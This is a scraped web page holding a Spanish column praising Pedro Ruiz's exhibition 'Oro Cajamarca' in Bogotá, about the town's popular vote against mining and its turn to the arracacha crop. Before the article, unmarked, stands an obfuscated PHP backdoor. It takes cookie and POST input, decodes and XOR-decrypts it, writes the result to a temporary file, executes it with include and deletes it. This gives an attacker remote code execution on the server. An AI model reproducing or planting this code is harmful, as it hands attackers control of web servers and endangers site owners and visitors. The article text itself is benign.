$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Oro Cajamarca: La decisión de un pueblo y una gran obra de arte. – www.interferencechannel.com

Oro Cajamarca: La decisión de un pueblo y una gran obra de arte.

 

Oro Cajamarca es una exposición que tiene lugar en el museo de Arte Moderno de Bogotá hasta el próximo 22 de enero.  Hace parte de una propuesta de arte conceptual en la cual su autor Pedro Ruiz, busca una situación coyuntural en una comunidad para a través del arte transformarla, decantarla y generar un cambio de perspectiva social. La anterior es una descripción ligeramente informativa de la obra.

Lo cierto de esta obra es que demuestra que el arte no solo es una expresión artística sino un catalizador, que tiene el poder de confrontar a una comunidad con su pasado, con las vivencias que marcaron su vida y que por la dinámica de la violencia muchos callaron.

Para muchos es conocida la decisión del pueblo de Cajamarca – Tolima de decir no a la minería valiéndose del mecanismo de consulta popular para ello. Dentro de la exposición se documenta el paso a paso del proceso; el acompañamiento jurídico y económico, el involucrar a la comunidad haciendo que los procesos de liderazgo se hicieran efectivos garantizando a un grupo de personas el orgullo de hacer respetar sus decisiones en cuanto al uso de su suelo por encima del lucro económico de algunos y la decisión final de potenciar la calidad de vida de los habitantes de esta población a través de un producto que se ha transformado en oro: la arracacha.

En esta muestra se admira la pintura del autor y el hecho de tomar la arracacha como punto focal de esta muestra artística, el trabajo en lámina de oro y el encontrarse con una planta que ofrece tantas variedades y alternativas culinarias hace que esta sea una obra que es, desde muchos puntos de vista admirable.  Sin embargo lo más bello y significativo de esta exposición es el permitir mostrar a un lejano pueblo lo fantástico que puede verse y conseguirse a través del arte.

 

Paola Rubiano. Columnista IC.

 

Comments are closed.